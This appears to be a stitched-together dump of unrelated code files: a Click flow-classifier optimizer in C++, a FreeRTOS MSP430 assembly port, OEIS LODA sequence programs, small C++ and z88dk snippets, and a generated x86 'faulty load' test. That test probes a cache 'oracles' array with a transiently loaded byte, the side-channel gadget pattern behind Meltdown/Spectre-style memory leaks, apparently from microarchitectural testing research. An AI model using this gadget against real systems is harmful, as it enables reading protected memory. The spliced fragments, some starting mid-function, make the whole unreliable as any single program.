if (other == 0) return this;
flow_assert(!other->is_dummy());
auto fnt = [other,discard_my_fcb_data,origin](FlowNodePtr* ptr) -> bool {
assert(ptr != 0);
assert(ptr->ptr != 0);
ptr->replace_leaf_with_node(other, discard_my_fcb_data, origin);
return true;
};
this->traverse_all_leaves(fnt, do_final, do_default);
//TODO delete other;
return this;
}
/**
* Optimize table, changing nodes perf the appropriate data structure, removinf useless classification step entries
* If the path is not mt-safe but reaches a non-mutable level (eg dynamic), a thread node will be added
*/
FlowNode* FlowNode::optimize(Bitvector threads) {
FlowNodePtr* ptr;
//Before everything else, remove this level if it's dynamic but useless
if (level()->is_dynamic() && !level()->is_usefull()) {
assert(getNum() == 0);
//No nead for this level
if (default_ptr()->is_node()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : no need for this dynamic level");
#endif
_default.set_parent(0);
return _default.node->optimize(threads);
} else {
click_chatter("WARNING : useless path, please specify this to author");
}
}
if (level()->is_mt_safe()) {
assert(threads.weight() == 1);
//TODO : if lock, it is a different story
}
_level = level()->optimize(this);
FlowNode* newnode;
if (level()->is_dynamic() && threads.weight() > 1) {
click_chatter("Optimize : Inserting FlowLevelThread node");
FlowLevel* thread = new FlowLevelThread(click_max_cpu_ids());
FlowNodeArray* fa = FlowAllocator<FlowNodeArray>::allocate();
fa->initialize(thread->get_max_value() + 1);
newnode = fa;
newnode->_level = thread;
newnode->_parent = parent();
newnode->default_ptr()->ptr = 0; //BUG if an unexpected thread classify, this is expected
for (int i = 0; i < click_max_cpu_ids(); i++) {
Bitvector tb(threads.size(), false);
tb[i] = true;
FlowNode* newNode = this->duplicate(true,1,true)->optimize(tb);
//FlowNode* newNode = thread->create_node(def, false, false);
//newNode->_level = def->level();
//We keep an identical default, which breaks parent but
// that is not a problem at this stage for a dynamic default (will never be released from child)
//*newNode->default_ptr() = *fa->default_ptr()->node->default_ptr();
FlowNodeData data = FlowNodeData((uint32_t)i);
bool need_grow;
FlowNodePtr* child_ptr = newnode->find(data,need_grow);
child_ptr->set_node(newNode);
child_ptr->set_data(data);
child_ptr->set_parent(newnode);
newnode->inc_num();
}
goto newnode;
}
//Optimize default
if (_default.ptr && _default.is_node())
_default.node = _default.node->optimize(threads);
if (!level()->is_dynamic()) {
if (getNum() == 0) {
//No nead for this level
if (default_ptr()->is_node()) {
//if (dynamic_cast<FlowNodeDummy*>(this) == 0) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : no need for this level");
#endif
/*FlowNodeDummy* fl = new FlowNodeDummy();
fl->assign(this);
fl->_default = _default;
_default.ptr = 0;
delete this;
fl->check();
return fl;*/
_default.set_parent(0);
newnode = _default.node;
goto newnode;
//}
} else {
//TODO
click_chatter("Non dynamic level, without child that has a leaf as ptr");
this->print();
click_chatter("Parent:");
this->parent()->print();
assert(false);
}
} else if (getNum() == 1) {
FlowNodePtr* child = (iterator().next());
if (_default.ptr == 0) {
if (child->is_leaf()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : one leaf child and no default value : creating a dummy level !");
//TODO : can't we set the child directly?
#endif
FlowNodeDummy* fl = new FlowNodeDummy();
fl->assign(this);
fl->set_default(child->optimize(threads));
newnode = fl;
} else { //Child is node
FlowNodeDefinition* defnode = dynamic_cast<FlowNodeDefinition*>(this);
if (defnode->_else_drop) {
FlowNodeTwoCase* fl = new FlowNodeTwoCase(child->optimize(threads));
fl->assign(this);
fl->inc_num();
fl->set_default(_default);
newnode = fl;
_default.ptr = 0;
} else {
#if DEBUG_CLASSIFIER
click_chatter(("Optimize : one child ("+defnode->name()+") and no default value : no need for this level !").c_str());
#endif
newnode = child->node;
}
}
} else { //_default.ptr != 0
#if DEBUG_CLASSIFIER
click_chatter("Optimize : only 2 possible case (value %lu or default %lu)",child->data().get_long(),_default.data().get_long());
#endif
FlowNodeTwoCase* fl = new FlowNodeTwoCase(child->optimize(threads));
fl->assign(this);
fl->inc_num();
fl->set_default(_default);
newnode = fl;
_default.ptr = 0;
}
child->set_parent(newnode);
child->ptr = 0;
dec_num();
assert(getNum() == 0);
//TODO delete this;
newnode->check();
goto newnode;
} else if (getNum() == 2) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : node has 2 children");
#endif
NodeIterator cit = iterator();
FlowNodePtr* childA = (cit.next());
FlowNodePtr* childB = (cit.next());
if (childB->else_drop() || !childA->else_drop()) {
FlowNodePtr* childTmp = childB;
childB = childA;
childA = childTmp;
}
if (_default.ptr == 0 && !childB->else_drop()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : 2 child and no default value : only 2 possible case (value %lu or value %lu)!",childA->data().get_long(),childB->data().get_long());
#endif
FlowNodePtr newA = childA->optimize(threads);
FlowNodeTwoCase* fl = new FlowNodeTwoCase(newA);
fl->inc_num();
fl->assign(this);
FlowNodePtr newB = childB->optimize(threads);
fl->set_default(newB);
newA.set_parent(fl);
newB.set_parent(fl);
newnode = fl;
} else {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : only 3 possible cases (value %lu, value %lu or default %lu)",childA->data().get_long(),childB->data().get_long(),_default.data().get_long());
#endif
FlowNodePtr ncA = childA->optimize(threads);
FlowNodePtr ncB = childB->optimize(threads);
#if DEBUG_CLASSIFIER
click_chatter("The 2 cases are :");
ncA.print();
click_chatter("And :");
ncB.print();
#endif
FlowNodeThreeCase* fl = new FlowNodeThreeCase(ncA,ncB);
fl->inc_num();
fl->inc_num();
fl->assign(this);
fl->set_default(_default);
ncA.set_parent(fl);
ncB.set_parent(fl);
_default.set_parent(fl);
newnode = fl;
_default.ptr = 0;
}
childA->ptr = 0;
childB->ptr = 0;
dec_num();
dec_num();
assert(getNum() == 0);
//TODO delete this;
newnode->check();
goto newnode;
} else {
#if DEBUG_CLASSIFIER
click_chatter("No optimization for level with %d children",getNum());
#endif
newnode = dynamic_cast<FlowNodeDefinition*>(this)->create_final(threads);
goto newnode;
}
} else {
#if DEBUG_CLASSIFIER
click_chatter("Dynamic level won't be optimized");
#endif
newnode = dynamic_cast<FlowNodeDefinition*>(this)->create_final(threads);
goto newnode;
}
//Unhandled case?
assert(false);
return this;
newnode:
#if DEBUG_CLASSIFIER
assert(newnode);
newnode->threads = threads;
#endif
return newnode;
}
FlowNodePtr FlowNodePtr::optimize(Bitvector threads) {
if (is_leaf()) {
return *this;
} else {
FlowNodePtr ptr = *this;
FlowNodeData data = node->node_data;
ptr.node = node->optimize(threads);
ptr.node->node_data = data;
ptr.node->check();
return ptr;
}
}
bool FlowNodePtr::else_drop() {
if (is_leaf())
return false;
else
return dynamic_cast<FlowNodeDefinition*>(node)->_else_drop;
}
/**
* True if no data is set in the FCB.
*/
bool FlowControlBlock::empty() {
for (unsigned i = sizeof(FlowNodeData); i < get_pool()->data_size();i++) {
if (data[i] != 0) {
debug_flow("data[%d] = %x is different",i,data[i]);
return false;
}
}
return true;
}
void FlowControlBlock::print(String prefix, int data_offset, bool show_ptr) const {
char data_str[(get_pool()->data_size()*2)+1];
int j = 0;
if (data_offset == -1) {
for (unsigned i = 0; i < get_pool()->data_size() && j < 60;i++) {
sprintf(&data_str[j],"%02x",data[i]);
j+=2;
}
} else {
sprintf(&data_str[j],"%02x",data[data_offset]);
}
if (show_ptr)
#if DEBUG_CLASSIFIER
click_chatter("%s %lu Parent:%p UC:%d ED:%d T:%d (%p data %s)",prefix.c_str(),node_data[0].get_long(),parent,count(),is_early_drop(),thread,this,data_str);
#else
click_chatter("%s %lu Parent:%p UC:%d ED:%d (%p data %s)",prefix.c_str(),node_data[0].get_long(),parent,count(),is_early_drop(),this,data_str);
#endif
else
click_chatter("%s %lu UC:%d ED:%d (data %s)",prefix.c_str(),node_data[0].get_long(),count(),is_early_drop(),data_str);
}
void FlowControlBlock::reverse_print() {
FlowNode* p = parent;
String prefix = "";
print(prefix);
if (parent)
parent->reverse_print();
}
FlowNode* FlowControlBlock::find_root() {
FlowNode* p = parent;
while (p != 0) {
p = p->parent();
}
return p;
}
int FlowControlBlock::hashcode() const {
int code = flags;
for (int i = 0; i < (get_pool()->data_size() - sizeof(FlowNodeData)) / 4; i ++) {
code += *(((uint32_t*)&node_data[1].data_32) + i);
}
return code;
}
bool operator==(const FlowControlBlockRef &ar, const FlowControlBlockRef &br) {
FlowControlBlock &a = *ar._ref;
FlowControlBlock &b = *br._ref;
if (a.flags != b.flags) {
//click_chatter("diff flags");
return false;
}
if (a.get_pool() != b.get_pool()) {
//click_chatter("diff pool");
return false;
}
if (memcmp(&(a.node_data[1].data_32),&(b.node_data[1].data_32), a.get_pool()->data_size() - sizeof(FlowNodeData)) != 0) {
/* click_chatter("diff content %d", a.get_pool()->data_size());
a.print("");
b.print("");*/
return false;
}
return true;
}
/*FlowControlBlock::FlowControlBlock(const FlowControlBlock &c) {
click_chatter("copy const");
memcpy(&node_data, &c.node_data, get_pool()->data_size());
}*/
void FlowNodePtr::print(int data_offset) const{
if (is_leaf())
leaf->print("",data_offset);
else
node->print(data_offset);
}
bool FlowControlBlock::combine_data(uint8_t* data, Element* origin) {
for (unsigned i = sizeof(FlowNodeData); i < get_pool()->data_size();i++) {
if (data[i + FCBPool::init_data_size()] == 0)
continue;
if (this->data[i + FCBPool::init_data_size()] == 0) {
this->data[i] = data[i];
this->data[i + FCBPool::init_data_size()] = 0xff;
} else {
if (this->data[i] != data[i]) {
click_chatter("!!!");
click_chatter("WARNING : CONFLICTING CLASSIFICATION !");
click_chatter("%p{element} has two sub-path that clash. This usually happen if two output ports have similar classification, such as sending IP packets both to port 0 and port 1. Context of each ports must be entierly exclusives.",origin);
click_chatter("They merge with different FCB values (%x, %x at offset %d), hence different decisions!",this->data[i], data[i],i);
click_chatter("WARNING : CONFLICTING CLASSIFICATION !");
click_chatter("!!!");
print("");
return false;
}
}
}
return true;
}
FlowNode* FlowLevel::create_node(FlowNode* parent, bool better, bool better_impl) {
int l;
if (better) {
if (dynamic_cast<FlowNodeHash<0>*>(parent) != 0) {
l = 0;
} else if (dynamic_cast<FlowNodeHash<1>*>(parent) != 0) {
l = 1;
} else if (dynamic_cast<FlowNodeHash<2>*>(parent) != 0) {
l = 2;
} else if (dynamic_cast<FlowNodeHash<3>*>(parent) != 0) {
l = 3;
} else if (dynamic_cast<FlowNodeHash<4>*>(parent) != 0) {
l = 4;
} else if (dynamic_cast<FlowNodeHash<5>*>(parent) != 0) {
l = 5;
} else if (dynamic_cast<FlowNodeHash<6>*>(parent) != 0) {
l = 6;
} else if (dynamic_cast<FlowNodeHash<7>*>(parent) != 0) {
l = 7;
} else if (dynamic_cast<FlowNodeHash<8>*>(parent) != 0) {
l = 8;
} else if (dynamic_cast<FlowNodeHash<9>*>(parent) != 0) {
l = 9;
} else {
//Not a hash
click_chatter("I don't know how to grow non-hash yet.");
abort();
}
if (l == 9) {
return 0;
}
++l;
if (l < current_level) { //TODO keep this as an aggressive mode
l = current_level;
}
}
else
{
l = current_level;
}
if (l >= 100 || FlowNodeHash<0>::capacity_for(l) >= this->get_max_value()) {
FlowNodeArray* fa = FlowAllocator<FlowNodeArray>::allocate();
fa->initialize(get_max_value() + 1);
l = 100;
return fa;
}
if (l > current_level)
current_level = l;
return FlowNode::create_hash(current_level);
}
/**
* Function not to be called at runtime ! Directly allocate
* the FCB using the right pool.
*/
FlowControlBlock* FlowControlBlock::duplicate(unsigned use_count) {
FlowControlBlock* fcb;
assert(FCBPool::initialized > 0);
//fcb = get_pool()->allocate();
fcb = FCBPool::init_allocate();
//fcb->release_ptr = release_ptr;
//fcb->release_fnt = release_fnt;
memcpy(fcb, this ,sizeof(FlowControlBlock) + (get_pool()->data_size() * 2));
#if HAVE_FLOW_DYNAMIC
fcb->use_count = use_count;
#endif
return fcb;
}
void FCBPool::compress(Bitvector threads) {
lists.compress(threads);
for (unsigned i = 0; i < lists.weight(); i++) {
SFCBList &list = lists.get_value(i);
for (int j = 0; j < SFCB_POOL_SIZE; j++) {
FlowControlBlock* fcb = alloc_new();
list.add(fcb);
}
}
}
FlowControlBlock*
FCBPool::init_allocate() {
FlowControlBlock* initfcb = (FlowControlBlock*)CLICK_LALLOC(sizeof(FlowControlBlock) + (init_data_size() * 2));
initfcb->initialize();
bzero(initfcb->data, (init_data_size() * 2));
return initfcb;
}
void
FCBPool::init_release(FlowControlBlock* fcb) {
CLICK_LFREE(fcb,sizeof(FlowControlBlock) + (init_data_size() * 2));
}
Spinlock FlowNode::printlock;
FCBPool* FCBPool::biggest_pool = 0;
int FCBPool::initialized = 0;
#endif
#if HAVE_CTX
CounterInitFuture _ctx_builded_init_future("CTXBuilder", [](){});
#endif
CLICK_ENDDECLS
|
/*
* FreeRTOS Kernel V10.3.1
* Copyright (C) 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of
* this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to
* use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
* the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* https://www.FreeRTOS.org
* https://github.com/FreeRTOS
*
* 1 tab == 4 spaces!
*/
#include "FreeRTOSConfig.h"
#include "portasm.h"
.CODE
/*
* The RTOS tick ISR.
*
* If the cooperative scheduler is in use this simply increments the tick
* count.
*
* If the preemptive scheduler is in use a context switch can also occur.
*/
_vTickISR:
portSAVE_CONTEXT
call #_xTaskIncrementTick
cmp.w #0x00, r15
jeq _SkipContextSwitch
call #_vTaskSwitchContext
_SkipContextSwitch:
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/*
* Manual context switch called by the portYIELD() macro.
*/
_vPortYield::
/* Mimic an interrupt by pushing the SR. */
push SR
/* Now the SR is stacked we can disable interrupts. */
dint
/* Save the context of the current task. */
portSAVE_CONTEXT
/* Switch to the highest priority task that is ready to run. */
call #_vTaskSwitchContext
/* Restore the context of the new task. */
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/*
* Start off the scheduler by initialising the RTOS tick timer, then restoring
* the context of the first task.
*/
_xPortStartScheduler::
/* Setup the hardware to generate the tick. Interrupts are disabled
when this function is called. */
call #_prvSetupTimerInterrupt
/* Restore the context of the first task that is going to run. */
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/* Place the tick ISR in the correct vector. */
.VECTORS
.KEEP
ORG TIMERA0_VECTOR
DW _vTickISR
END
|
; A305272: a(n) = 836*2^n - 676.
; 160,996,2668,6012,12700,26076,52828,106332,213340,427356,855388,1711452,3423580,6847836,13696348,27393372,54787420,109575516,219151708,438304092,876608860,1753218396,3506437468,7012875612,14025751900,28051504476,56103009628,112206019932,224412040540,448824081756,897648164188,1795296329052,3590592658780,7181185318236,14362370637148,28724741274972,57449482550620,114898965101916,229797930204508,459595860409692,919191720820060,1838383441640796,3676766883282268,7353533766565212
mov $1,2
pow $1,$0
sub $1,1
mul $1,836
add $1,160
|
; A090381: Expansion of (1+4x+7x^2)/((1-x)^2*(1-x^2)).
; 1,6,19,36,61,90,127,168,217,270,331,396,469,546,631,720,817,918,1027,1140,1261,1386,1519,1656,1801,1950,2107,2268,2437,2610,2791,2976,3169,3366,3571,3780,3997,4218,4447,4680,4921,5166,5419,5676,5941,6210,6487,6768,7057,7350,7651,7956,8269,8586,8911,9240,9577,9918,10267,10620,10981,11346,11719,12096,12481,12870,13267,13668,14077,14490,14911,15336,15769,16206,16651,17100,17557,18018,18487,18960,19441,19926,20419,20916,21421,21930,22447,22968,23497,24030,24571,25116,25669,26226,26791,27360,27937,28518,29107,29700,30301,30906,31519,32136,32761,33390,34027,34668,35317,35970,36631,37296,37969,38646,39331,40020,40717,41418,42127,42840,43561,44286,45019,45756,46501,47250,48007,48768,49537,50310,51091,51876,52669,53466,54271,55080,55897,56718,57547,58380,59221,60066,60919,61776,62641,63510,64387,65268,66157,67050,67951,68856,69769,70686,71611,72540,73477,74418,75367,76320,77281,78246,79219,80196,81181,82170,83167,84168,85177,86190,87211,88236,89269,90306,91351,92400,93457,94518,95587,96660,97741,98826,99919,101016,102121,103230,104347,105468,106597,107730,108871,110016,111169,112326,113491,114660,115837,117018,118207,119400,120601,121806,123019,124236,125461,126690,127927,129168,130417,131670,132931,134196,135469,136746,138031,139320,140617,141918,143227,144540,145861,147186,148519,149856,151201,152550,153907,155268,156637,158010,159391,160776,162169,163566,164971,166380,167797,169218,170647,172080,173521,174966,176419,177876,179341,180810,182287,183768,185257,186750
mov $4,$0
mod $0,2
pow $1,$0
mov $2,$4
mul $2,3
add $1,$2
mov $3,$4
mul $3,$4
mov $2,$3
mul $2,3
add $1,$2
|
; A245243: Triangle, read by rows, defined by T(n,k) = C(n^2 - k^2, n*k - k^2), for k=0..n, n>=0.
; Submitted by Christian Krause
; 1,1,1,1,3,1,1,28,10,1,1,455,495,35,1,1,10626,54264,8008,126,1,1,324632,10518300,4686825,125970,462,1,1,12271512,3190187286,5586853480,354817320,1961256,1716,1,1,553270671,1399358844975,11899700525790,2254848913647,25140840660,30421755,6435,1,1,28987537150,839983521106400,41432089765583440,28339603908273840,785613562163430,1715884494940,471435600,24310,1,1,1731030945644,662252084388541314,220916541203370737010,641953325024894839320,52588547141148893628,250649105469666120,114456658306760
lpb $0
add $1,1
sub $0,$1
mov $2,$1
sub $2,$0
lpe
mul $0,$2
mul $1,$2
add $0,$1
bin $0,$1
|
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x1ebe6, %rsi
lea addresses_normal_ht+0x1c016, %rdi
and %r12, %r12
mov $124, %rcx
rep movsb
nop
nop
nop
nop
nop
add %rax, %rax
lea addresses_D_ht+0x33a2, %rsi
lea addresses_normal_ht+0x1d216, %rdi
clflush (%rsi)
nop
cmp %r8, %r8
mov $49, %rcx
rep movsb
nop
nop
nop
nop
cmp $30535, %r12
lea addresses_WC_ht+0x17ec6, %rdi
clflush (%rdi)
add $2695, %r15
mov (%rdi), %rsi
nop
nop
nop
nop
nop
xor %rdi, %rdi
lea addresses_WC_ht+0x6ecc, %rdi
nop
nop
and $50033, %r8
mov (%rdi), %r12
nop
nop
nop
nop
nop
and %rsi, %rsi
lea addresses_A_ht+0x11c6, %rsi
nop
nop
and $45815, %rdi
mov $0x6162636465666768, %r15
movq %r15, %xmm1
and $0xffffffffffffffc0, %rsi
movntdq %xmm1, (%rsi)
nop
nop
nop
nop
nop
xor $16479, %rsi
lea addresses_D_ht+0xc6c6, %r8
nop
nop
nop
nop
nop
dec %rax
mov $0x6162636465666768, %rdi
movq %rdi, (%r8)
nop
cmp $39752, %rcx
lea addresses_A_ht+0x59c6, %r8
nop
nop
nop
nop
add $12255, %rsi
mov $0x6162636465666768, %rdi
movq %rdi, %xmm4
vmovups %ymm4, (%r8)
add %r15, %r15
lea addresses_D_ht+0x43c6, %r8
nop
dec %rdi
mov (%r8), %ecx
nop
nop
nop
nop
cmp %r15, %r15
lea addresses_WC_ht+0xbacc, %r15
nop
xor $4937, %rsi
mov (%r15), %r8d
nop
nop
and $37558, %rcx
lea addresses_WC_ht+0x1464e, %r15
clflush (%r15)
nop
nop
nop
sub %rcx, %rcx
mov $0x6162636465666768, %rdi
movq %rdi, (%r15)
nop
nop
nop
nop
inc %r12
lea addresses_A_ht+0xf386, %r12
nop
nop
nop
cmp $38014, %rcx
mov $0x6162636465666768, %r8
movq %r8, %xmm4
movups %xmm4, (%r12)
nop
nop
nop
nop
nop
add $15519, %rcx
lea addresses_normal_ht+0xd246, %rsi
lea addresses_WT_ht+0x2106, %rdi
clflush (%rdi)
nop
sub $7832, %r9
mov $58, %rcx
rep movsq
nop
nop
nop
nop
nop
add $26970, %rax
lea addresses_UC_ht+0x1cca6, %rdi
nop
sub $45483, %rsi
mov $0x6162636465666768, %rax
movq %rax, %xmm1
movups %xmm1, (%rdi)
nop
cmp %r15, %r15
lea addresses_A_ht+0x109e6, %rcx
nop
nop
nop
nop
nop
sub %rsi, %rsi
movl $0x61626364, (%rcx)
nop
nop
nop
xor %rdi, %rdi
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r8
pop %r15
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r15
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
// REPMOV
lea addresses_D+0x1e7c6, %rsi
lea addresses_A+0xed0c, %rdi
nop
nop
nop
nop
nop
xor $9836, %rax
mov $19, %rcx
rep movsb
nop
cmp %rcx, %rcx
// Faulty Load
lea addresses_A+0x163c6, %rsi
nop
nop
nop
nop
xor %r15, %r15
movntdqa (%rsi), %xmm0
vpextrq $1, %xmm0, %r12
lea oracles, %rdi
and $0xff, %r12
shlq $12, %r12
mov (%rdi,%r12,1), %r12
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r15
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 32, 'NT': False, 'type': 'addresses_A', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D', 'congruent': 6}, 'dst': {'same': False, 'type': 'addresses_A', 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 16, 'NT': True, 'type': 'addresses_A', 'same': True, 'AVXalign': False, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 5}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 3}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 1}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 4}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': True, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'STOR', 'dst': {'size': 32, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 10}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 1}}
{'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 7}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 6}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 2}}
{'44': 18, '36': 21628, '00': 2, '46': 181}
00 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36
*/
|
#include "Adapter.h"
Adapter::Adapter()
{
}
Adapter::~Adapter()
{
}
|
template<> std::optional<std::string> ConfigProxy::Get<std::string>(const std::string&) const;
template<> std::optional<bool> ConfigProxy::Get<bool>(const std::string&) const;
template<> std::optional<int64_t> ConfigProxy::Get<int64_t>(const std::string&) const;
template<> std::optional<int32_t> ConfigProxy::Get<int32_t>(const std::string&) const;
template<> std::optional<uint64_t> ConfigProxy::Get<uint64_t>(const std::string&) const;
template<> std::optional<uint32_t> ConfigProxy::Get<uint32_t>(const std::string&) const;
template<> std::optional<float> ConfigProxy::Get<float>(const std::string&) const;
template<> std::optional<double> ConfigProxy::Get<double>(const std::string&) const;
template<typename T>
T ConfigProxy::Get(const std::string& key, T&& def) const
{
return Get<T>(key).value_or(std::forward<T>(def));
}
template <typename T>
T ConfigProxy::Require(const std::string& key) const
{
std::optional<T> r = Get<T>(key);
if (!r)
{
std::string resolvedKey = m_moduleName + "_" + key;
std::transform(std::begin(resolvedKey), std::end(resolvedKey), std::begin(resolvedKey), ::toupper);
throw std::runtime_error("Required config key missing or invalid: " + resolvedKey);
}
return r.value();
}
|
; ===============================================================
; Mar 2014
; ===============================================================
;
; int b_vector_back(b_vector_t *v)
;
; Return char stored at the end of the vector.
; If the vector is empty, return -1.
;
; ===============================================================
SECTION code_clib
SECTION code_adt_b_vector
PUBLIC asm_b_vector_back
EXTERN asm_b_array_back
defc asm_b_vector_back = asm_b_array_back
; enter : hl = vector *
;
; exit : success
;
; de = & last char in vector
; hl = last char in vector
; carry reset
;
; fail if vector is empty
;
